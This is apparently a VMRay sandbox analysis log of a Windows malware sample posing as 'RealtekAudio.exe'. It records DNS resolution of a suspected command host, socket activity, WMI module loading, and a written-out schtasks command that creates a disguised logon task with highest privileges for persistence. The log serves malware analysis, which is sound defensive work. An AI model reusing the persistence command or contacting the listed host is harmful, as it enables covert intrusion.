Inet Close Session - True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Thread 0xcc8
0 2
»
Category Operation Information Success Count Logfile
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Thread 0xccc
3 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 3
Fn
Thread 0xcd4
52 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = Unknown module name, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = Unknown module name, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = Unknown module name, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = Unknown module name, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = Unknown module name, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = Unknown module name, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = Unknown module name, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = Unknown module name, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = Unknown module name, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = Unknown module name, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = Unknown module name, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = Unknown module name, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = Unknown module name, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = Unknown module name, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = Unknown module name, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = Unknown module name, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = Unknown module name, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = Unknown module name, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = Unknown module name, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = Unknown module name, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = Unknown module name, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = Unknown module name, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = Unknown module name, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = Unknown module name, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = Unknown module name, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = Unknown module name, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = Unknown module name, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = Unknown module name, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = Unknown module name, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = Unknown module name, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = Unknown module name, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Thread 0xce0
2 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #12: schtasks.exe
19 0
»
Information Value
ID #12
File Name c:\windows\system32\schtasks.exe
Command Line "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:01:46, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xcec
Parent PID 0xca0 (c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x CF0
0x D00
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory rw True False False -
schtasks.exe.mui 0x000e0000 0x000f1fff Memory Mapped File rw False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory rw True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory rw True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory rw True False False -
rpcss.dll 0x00160000 0x001bbfff Memory Mapped File r False False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory r True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory rw True False False -
pagefile_0x00000000001e0000 0x001e0000 0x002a7fff Pagefile Backed Memory r True False False -
schtasks.exe 0x002f0000 0x0031dfff Memory Mapped File rwx True False False -
pagefile_0x0000000000320000 0x00320000 0x00420fff Pagefile Backed Memory r True False False -
private_0x0000000000480000 0x00480000 0x0057ffff Private Memory rw True False False -
pagefile_0x0000000000580000 0x00580000 0x0117ffff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01180000 0x0144efff Memory Mapped File r False False False -
private_0x0000000001450000 0x01450000 0x015affff Private Memory rw True False False -
pagefile_0x0000000001450000 0x01450000 0x0152efff Pagefile Backed Memory r True False False -
private_0x0000000001570000 0x01570000 0x015affff Private Memory rw True False False -
private_0x0000000001690000 0x01690000 0x016cffff Private Memory rw True False False -
ktmw32.dll 0x734c0000 0x734c8fff Memory Mapped File rwx False False False -
taskschd.dll 0x739e0000 0x73a5cfff Memory Mapped File rwx False False False -
xmllite.dll 0x73e80000 0x73eaefff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Threads
Thread 0xcf0
19 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:39 (UTC) True 1
Fn
System Get Time type = Ticks, time = 159589 True 1
Fn
Module Get Handle module_name = c:\windows\system32\schtasks.exe, base_address = 0x2f0000 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
Module Load module_name = VERSION.dll, base_address = 0x748d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoSizeW, address_out = 0x748d19d9 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoW, address_out = 0x748d19f4 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = VerQueryValueW, address_out = 0x748d1b51 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-08-10 02:09:39 (Local Time) True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x769f0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x76a0157a True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 83 True 1
Fn
Data
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image